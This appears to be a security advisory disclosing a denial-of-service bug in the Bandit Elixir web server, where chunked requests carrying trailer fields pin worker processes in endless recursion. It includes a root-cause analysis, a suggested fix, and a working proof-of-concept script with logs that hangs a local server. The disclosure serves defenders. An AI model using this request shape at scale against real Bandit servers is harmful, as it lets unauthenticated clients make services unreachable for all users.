Summary

A worker-pinning denial of service in Bandit's HTTP/1 chunked transfer decoder. Any unauthenticated client that sends a Transfer-Encoding: chunked request whose body ends with a trailer field (RFC 9112 §7.1.2 explicitly permits this) causes the connection's worker process to spin forever in an infinite recursion. A handful of concurrent connections are sufficient to exhaust the listener pool and render the server unresponsive to all further traffic.

The vulnerability was likely introduced with this commit on Dec 6, 2024: mtrudel/bandit@e73e379

Details

The bug is in lib/bandit/http1/socket.ex in do_read_chunked_data!/5 (around lines 242–274). The terminator clause matches only ["0", "\r\n" <> rest] — i.e. the last-chunk line 0\r\n followed immediately by the empty trailer line. RFC 9112 §7.1.2 allows zero or more trailer fields between 0\r\n and the final \r\n, e.g. a body ending 0\r\nX-T: v\r\n\r\n.

When trailers are present, :binary.split/2 returns ["0", "X-T: v\r\n\r\n"]. The terminator clause does not match. The inner <<_::binary-size(0), ?\r, ?\n, _::binary>> pattern also does not match because rest starts with X. Execution falls into the _ -> arm, which computes to_read = 0 - byte_size(rest) (a negative number) and calls read_available!/2 on the socket. On timeout, read_available!/2 returns <<>>, leaving the buffer unchanged. do_read_chunked_data!/5 then tail-recurses with the same state and makes no forward progress. The worker is pinned for the lifetime of the TCP connection.

The same shape applies to malformed chunk frames where the declared chunk-size disagrees with the actual data length: the binary-size pattern cannot match and read_available! is repeatedly called with no progress.

The gap is acknowledged in the source itself — the comment on line 245 reads: "We should be reading (and ignoring) trailers here".

Suggested fix: after the 0 size line, consume bytes up to \r\n\r\n (parsing/discarding trailers via :erlang.decode_packet(:httph_bin, …)) before returning. Additionally, ensure every recursive arm makes forward progress — when read_available!/2 returns <<>>, raise request_error!(:request_timeout) rather than re-entering with an unchanged buffer.

PoC

A self-contained reproduction script is available below. It starts Bandit 1.10 on 127.0.0.1:4321 with a trivial echo Plug, opens a TCP connection, and sends a single chunked POST whose body is:

• one 5-byte chunk "hello"
• the last-chunk marker 0\r\n
• one trailer field X-Trailer: 1\r\n
• the terminating \r\n

The request is fully RFC-conformant; many fronting proxies (NGINX, HAProxy) emit this exact shape when forwarding trailer-bearing requests. A correct server responds within milliseconds. With the bug, :gen_tcp.recv/3 times out after 10 seconds because the worker is stuck spinning in do_read_chunked_data!/5.

Steps to reproduce:

1. elixir script.exs
2. Observe the TIMEOUT — worker is pinned in do_read_chunked_data!/5 log line.
3. Each additional concurrent client sending the same request consumes one more worker process.

Impact

Unauthenticated denial of service against any Bandit-fronted HTTP/1 service that accepts chunked request bodies — the default for Phoenix and Plug applications. No authentication, no special headers, and no large payload are required; a small number of attacker-controlled connections is enough to exhaust the worker pool and make the server unreachable for all users. Servers sitting behind proxies that legitimately forward trailer-bearing requests can also be affected without any malicious client involvement.

Script and Logs

# Bandit HTTP/1 chunked decoder hangs on requests with trailer headers.
#
# lib/bandit/http1/socket.ex:242-274 (do_read_chunked_data!/5) terminates
# only when the last-chunk line `0\r\n` is followed *immediately* by the
# empty trailer line `\r\n`. RFC 9112 §7.1.2 allows trailer fields between
# them (e.g. `0\r\nX-T: v\r\n\r\n`). With trailers present, none of the
# match clauses fit: the `_` arm computes `to_read = 0 - byte_size(rest)`
# (negative), calls read_available!/2, gets <<>> on timeout, and recurses
# with the same buffer forever — pinning the worker for the connection's
# lifetime. The line 245 comment ("We should be reading (and ignoring)
# trailers here") acknowledges the gap.
#
# This script starts Bandit 1.10 on 127.0.0.1:4321, sends one chunked POST
# whose body ends with a single trailer field, and waits for a response.
# A correct server replies in milliseconds; the buggy decoder never does.
#
# Run: elixir script.exs

Mix.install([
  {:bandit, "~> 1.10"},
  {:plug, "~> 1.19"}
])

defmodule EchoApp do
  @behaviour Plug
  def init(opts), do: opts

  def call(conn, _opts) do
    {:ok, body, conn} = Plug.Conn.read_body(conn)
    Plug.Conn.send_resp(conn, 200, "got #{byte_size(body)} bytes")
  end
end

defmodule TrailerHang do
  @port 4321
  @recv_timeout_ms 10_000

  def run do
    {:ok, _} = Bandit.start_link(plug: EchoApp, ip: {127, 0, 0, 1}, port: @port)

    {:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])

    request = build_chunked_request_with_trailer()
    log("Sending chunked POST whose body ends with `0\\r\\nX-Trailer: 1\\r\\n\\r\\n`.")
    :ok = :gen_tcp.send(sock, request)

    log("Waiting up to #{div(@recv_timeout_ms, 1000)}s for a response (a correct server replies in ms)…")
    started_at = System.monotonic_time(:millisecond)

    case :gen_tcp.recv(sock, 0, @recv_timeout_ms) do
      {:ok, response} ->
        elapsed = System.monotonic_time(:millisecond) - started_at
        log("Got response after #{elapsed}ms — server handles trailers correctly:")
        IO.puts(binary_part(response, 0, min(byte_size(response), 256)))

      {:error, :timeout} ->
        log("TIMEOUT — worker is pinned in do_read_chunked_data!/5.")
        log("Each concurrent client sending this shape consumes one Bandit worker.")

      {:error, reason} ->
        log("Connection error: #{inspect(reason)}")
    end

    :gen_tcp.close(sock)
  end

  # Body: one 5-byte chunk "hello", last-chunk marker `0\r\n`, one trailer
  # `X-Trailer: 1\r\n`, terminating `\r\n`. RFC-conformant; many proxies
  # (NGINX, HAProxy) emit this shape when forwarding trailer-bearing
  # responses or requests.
  defp build_chunked_request_with_trailer do
    "POST / HTTP/1.1\r\n" <>
      "Host: 127.0.0.1:#{@port}\r\n" <>
      "Transfer-Encoding: chunked\r\n" <>
      "Trailer: X-Trailer\r\n" <>
      "Content-Type: application/octet-stream\r\n" <>
      "\r\n" <>
      "5\r\nhello\r\n" <>
      "0\r\n" <>
      "X-Trailer: 1\r\n" <>
      "\r\n"
  end

  defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end

TrailerHang.run()

12:36:54.260 [info] Running EchoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[10:36:54.275] Sending chunked POST whose body ends with `0\r\nX-Trailer: 1\r\n\r\n`.
[10:36:54.276] Waiting up to 10s for a response (a correct server replies in ms)…
[10:37:04.276] TIMEOUT — worker is pinned in do_read_chunked_data!/5.
[10:37:04.276] Each concurrent client sending this shape consumes one Bandit worker.

References

• GHSA-rf5q-vwxw-gmrf
• https://nvd.nist.gov/vuln/detail/CVE-2026-39806
• mtrudel/bandit@ae3520d
• https://cna.erlef.org/cves/CVE-2026-39806.html
• https://osv.dev/vulnerability/EEF-CVE-2026-39806